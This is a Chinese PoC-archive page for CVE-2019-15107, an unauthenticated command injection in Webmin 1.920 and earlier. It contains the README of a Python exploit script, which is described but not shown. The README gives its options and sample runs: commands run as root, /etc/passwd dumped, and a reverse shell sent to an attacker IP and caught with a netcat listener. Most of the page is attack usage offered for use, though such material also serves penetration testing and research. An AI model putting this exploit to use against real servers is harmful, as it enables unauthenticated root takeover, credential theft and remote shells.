关联漏洞
标题:
Webmin 命令操作系统命令注入漏洞
(CVE-2019-15107)
描述:Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令操作系统命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令。
描述
CVE-2019-15107 Webmin unauthenticated RCE
介绍
# CVE-2019-15107 Webmin 1.890 Unauthenticated Remote Code Execution
This script is designed to exploit unauthenticated command execution vulnerability in Webmin 1.890. It allows you to execute arbitrary commands on a target Webmin server or to obtain a reverse shell.
## Usage
The exploit takes 5 arguments:
```bash
$ python3 test.py -h
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]
Exploit unauthenticated command execution in Webmin 1.890.
options:
-h, --help show this help message and exit
required arguments:
-i IP Address, --ip IP Address
Target ip address
optional arguments:
-p Port number, --port Port number
Webmin port(default=10000)
-c Command, --command Command
OS Command to execute (Default=id)
--shell Get a reverse shell
-x, --proxy Sends requests through Burp Suite proxy at 127.0.0.1:8080.
Example:
python exploit.py -i 192.168.1.100
python exploit.py -i 192.168.1.100 -p 10000 -c whoami
python exploit.py -i 192.168.1.100 -x -c "ls -la"
python exploit.py -i 192.168.1.100 --shell
```
The only required option is `-i` which is the ip address of the target.
Running the exploit with only `-i` will execute the command `id` at a target located on port `10000`
```bash
$ python3 exploit.py -i 10.200.105.200
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```
### Command execution
You can specify what command to run using the `-c` or `--command` options:
```bash
$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]
```
### Reverse shell
You can also get a reverse shell by using the `--shell` option.
> You will be prompt to enter your IP address and the listening port:
```bash
$ python3 exploit.py -i 10.200.105.200 --shell
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
```
```bash
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]#
```
### Proxy
By adding `-x` or `--proxy` option you can send the request though burp proxy at 127.0.0.1:8080
## References
<https://nvd.nist.gov/vuln/detail/cve-2019-15107>
文件快照
[4.0K] /data/pocs/ca4d79f0ebca5eb1fb6915d5764a29a607011626
├── [3.2K] exploit.py
└── [2.4K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。